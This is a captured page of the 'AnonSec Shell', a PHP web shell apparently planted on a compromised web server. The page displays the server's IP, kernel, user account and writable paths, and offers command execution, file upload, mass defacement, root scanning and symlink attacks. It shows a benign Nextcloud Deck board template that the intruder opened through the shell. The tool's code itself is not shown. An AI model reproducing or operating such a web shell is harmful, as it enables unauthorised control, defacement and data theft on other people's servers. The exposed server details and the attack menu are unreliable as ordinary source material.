. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 85.13.141.101  /  Your IP : 216.73.216.95   [ Reverse IP ]
Web Server : Apache
System : Linux dd40236 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64
User : w00ad34b ( 1052)
PHP Version : 8.2.30-nmm1
Disable Function : NONE
Domains : 429 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /www/htdocs/w00ad34b/spd-cloud/apps/deck/templates/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /www/htdocs/w00ad34b/spd-cloud/apps/deck/templates/part.board.mainView.php
<div id="board-status" ng-if="statusservice.active">
	<div id="emptycontent">
		<div class="icon-{{ statusservice.icon }}"></div>
		<h2>{{ statusservice.title }}</h2>
		<p>{{ statusservice.text }}</p></div>
</div>

<div id="controls">
	<div class="crumb">
		<a href="#" class="icon-home" title="<?php p($l->t('All Boards')); ?>"></a>
	</div>
	<div class="crumb" ng-if="boardservice.getCurrent().archived">
		<a class="icon-archive"></a>
		<a ui-sref="list({ filter: 'archived' })"><?php p($l->t('Archived boards')); ?></a>
	</div>
	<div class="crumb title">
		<a class="bullet"><span class="board-bullet" ng-style="{'background-color':'#' + boardservice.getCurrent().color}"></span></a>
		<a ui-sref=".({filter: ''})">{{ boardservice.getCurrent().title }}</a>
		<a ui-sref=".detail({ tab: 0 })" title="<?php p($l->t('Share board')); ?>"><span class="icon icon-share"></span></a>
	</div>
	<div class="crumb title" ng-if="params.filter=='archive'">
		<a><span class="icon icon-archive"></span></a>
		<a><?php p($l->t('Archived cards')); ?></a>
	</div>

	<div class="board-header-controls hidden">
		<?php print_unescaped($this->inc('part.board.headerControls', ['headerControlsId' => 'main'])); ?>
	</div>
	<div class="board-header-controls app-popover-menu-utils">
		<button class="icon-more button" title="<?php p($l->t('Actions')) ?>"></button>
		<div class="popovermenu hidden">
			<div id="popover-controls">
				<?php print_unescaped($this->inc('part.board.headerControls', ['headerControlsId' => 'popover'])); ?>
			</div>
		</div>
	</div>
</div>

<div id="board" class="scroll-container" ng-click="sidebar.show=false" ui-sref="board" ng-class="{'card-selected': params.cardId}">
	<search on-search="search" class="ng-hide"></search>

	<div id="innerBoard" data-ng-model="stacks" data-as-sortable="sortOptionsStack">
		<div class="stack" ng-repeat="s in stacks" data-as-sortable-item
			 data-columnindex="{{$index}}" id="column{{$index}}"
			 style="">
			<h3 data-as-sortable-item-handle>
				<span class="editable-inline"
				 ng-show="!s.status.editStack"
				 ng-click="s.status.editStack=true">{{ s.title }}</span>

				<form ng-if="s.status.editStack" ng-submit="stackservice.update(s); s.status.editStack=false">
					<input type="text" placeholder="<?php p($l->t('Add a new stack')); ?>"
						   ng-blur="stackservice.update(s); s.status.editStack=false" ng-model="s.title"
						   autofocus-on-insert required maxlength="100" />
				</form>
				<button class="icon-delete button-inline stack-actions"
						ng-if="!s.status.editStack"
						ng-click="stackDelete(s)"></button>
			</h3>
			<ul data-as-sortable="sortOptions" is-disabled="!boardservice.canEdit() || filter==='archive'" data-ng-model="s.cards" class="card-list" ng-class="{emptyStack: !s.cards.length}">
				<li class="card as-sortable-item"
					ng-repeat="c in s.cards"
					data-as-sortable-item
					ng-click="$event.stopPropagation()"
					ui-sref="board.card({boardId: id, cardId: c.id})"
					ng-class="{'archived': cardservice.get(c.id).archived, 'has-labels': cardservice.get(c.id).labels.length>0, 'current': cardservice.get(c.id).id == params.cardId, 'overdue': cardservice.get(c.id).overdue == 3, 'now': cardservice.get(c.id).overdue == 2, 'next': cardservice.get(c.id).overdue == 1, 'has-tasks': getCheckboxes(cardservice.get(c.id).description)[1] > 0, 'has-tasks-completed': getCheckboxes(cardservice.get(c.id).description)[1] > 0 && getCheckboxes(cardservice.get(c.id).description)[1] == getCheckboxes(cardservice.get(c.id).description)[0] }"
					nv-file-drop="" uploader="uploader" options="{cardId: c.id}">
					<div class="drop-indicator" uploader="uploader" nv-file-over>
						<p><?php p($l->t('Drop your files here to upload it to the card')); ?></p>
					</div>
					<div data-as-sortable-item-handle>
						<div class="card-upper">
							<h4>
								<span class="editable-inline"
									ng-show="!c.status.editCard"
									ng-click="$event.stopPropagation(); startTitleEdit(c)">{{cardservice.get(c.id).title}}</span>
								<form ng-if="c.status.editCard" ng-submit="finishTitleEdit(c)">
									<input
											class="input-inline"
											type="text"
											ng-blur="finishTitleEdit(c)"
											ng-model="c.renameTitle"
											autofocus-on-insert
											required
											maxlength="100">
								</form>
							</h4>
							<ul class="labels compact-item" ng-if="!compactMode">
								<li ng-repeat="label in cardservice.get(c.id).labels"
									ng-style="labelStyle(label.color)" title="{{ label.title }}">
									<span>{{ label.title }}</span>
								</li>
							</ul>
						</div>

						<div class="card-controls compact-item" ng-if="!compactMode">
							<i class="icon icon-description" ng-if="cardservice.get(c.id).description" title="{{ cardservice.get(c.id).description }}"></i>
							<span class="due" ng-if="cardservice.get(c.id).duedate" ng-class="{'overdue': cardservice.get(c.id).overdue == 3, 'now': cardservice.get(c.id).overdue == 2, 'next': cardservice.get(c.id).overdue == 1  }" title="{{ cardservice.get(c.id).duedate }}">
								<i class="icon icon-badge"></i>
								<span data-timestamp="{{ cardservice.get(c.id).duedate | dateToTimestamp }}" class="live-relative-timestamp">{{ cardservice.get(c.id).duedate | relativeDateFilterString }}</span>
							</span>
							<div class="card-tasks" ng-if="getCheckboxes(cardservice.get(c.id).description)[1] > 0">
								<i class="icon icon-checkmark"></i>
								<span>{{ getCheckboxes(cardservice.get(c.id).description)[0] }}/{{ getCheckboxes(cardservice.get(c.id).description)[1] }}</span>
							</div>
							<div class="card-files" ng-if="attachmentCount(cardservice.get(c.id)) > 0">
								<i class="icon icon-files-dark"></i>
								<span>{{ attachmentCount(cardservice.get(c.id)) }}</span>
							</div>
							<div class="card-comments" ng-if="unreadCommentCount(cardservice.get(c.id)) > 0">
								<i class="icon icon-comment"></i>
								<span>{{ unreadCommentCount(cardservice.get(c.id)) }}</span>
							</div>
							<div class="card-assigned-users">
								<div class="assigned-user" ng-repeat="user in cardservice.get(c.id).assignedUsers | limitTo: 3">
									<avatar data-user="{{ user.participant.uid }}" data-displayname="{{ user.participant.displayname }}" data-tooltip></avatar>
								</div>
							</div>
							<div class="app-popover-menu-utils" ng-if="!boardservice.isArchived()">
								<button class="button-inline card-options icon-more" ng-model="card" title="<?php p($l->t('Actions')) ?>"></button>
								<div class="popovermenu hidden">
									<ul>
										<li ng-if="!isCurrentUserAssigned(c)">
											<a class="menuitem action action-rename permanent"
											   data-action="AssignToMe"
											   ng-click="cardAssignToMe(c); $event.stopPropagation();"><span
														class="icon icon-user"></span><span><?php p($l->t('Assign card to me')); ?></span></a>
										</li>
										<li ng-if="isCurrentUserAssigned(c)">
											<a class="menuitem action action-rename permanent"
											   data-action="UnassignFromMe"
											   ng-click="cardUnassignFromMe(c); $event.stopPropagation();"><span
														class="icon icon-user"></span><span><?php p($l->t('Unassign card from me')); ?></span></a>
										</li>
										<li ng-if="params.filter!=='archive'">
											<a class="menuitem action action-rename permanent"
											   data-action="Archive"
											   ng-click="cardArchive(c); $event.stopPropagation();"><span
														class="icon icon-archive"></span><span><?php p($l->t('Archive card')); ?></span></a>
										</li>
										<li ng-if="params.filter==='archive'">
											<a class="menuitem action action-rename permanent"
											   data-action="Unarchive"
											   ng-click="cardUnarchive(c); $event.stopPropagation();"><span
														class="icon icon-archive"></span><span><?php p($l->t('Unarchive card')); ?></span></a>
										</li>
										<li>
											<a class="menuitem action action-delete permanent"
											   data-action="Delete"
											   ng-click="cardDelete(c); $event.stopPropagation();"><span
														class="icon icon-delete"></span><span><?php p($l->t('Delete card')); ?></span></a>
										</li>
									</ul>
								</div>
							</div>
						</div>

					</div>
				</li>
			</ul>

			<!-- CREATE CARD //-->
			<div
					class="card create"
					ng-class="{emptyStack: !s.cards.length}"
				 	ng-style="{'border-color':'#{{ boardservice.getCurrent().color }}'}"
					ng-if="boardservice.canEdit() && checkCanEdit() && params.filter !== 'archive'">
				<form name="addCardForm{{ s.id }}" ng-submit="createCard(s.id, newCard.title)">
					<h4 ng-if="status.addCard[s.id]">
						<input type="text" autofocus-on-insert
							   ng-model="newCard.title"
							   ng-blur="status.addCard[s.id]=false"
							   ng-style="{'border-color':'{{ boardservice.getCurrent().color | textColorFilter }}'}"
							   maxlength="100"
							   required placeholder="<?php p($l->t('Enter a card title')); ?>"/>
					</h4>
				</form>
				<div ng-if="!status.addCard[s.id]" ng-click="status.addCard[s.id]=true" title="<?php p($l->t('Add card')); ?>">
					<i class="icon icon-add"></i>
					<span class="hidden-visually"><?php p($l->t('Add card')); ?></span>
				</div>
			</div>
		</div>

	</div>

</div>

Anon7 - 2022
AnonSec Team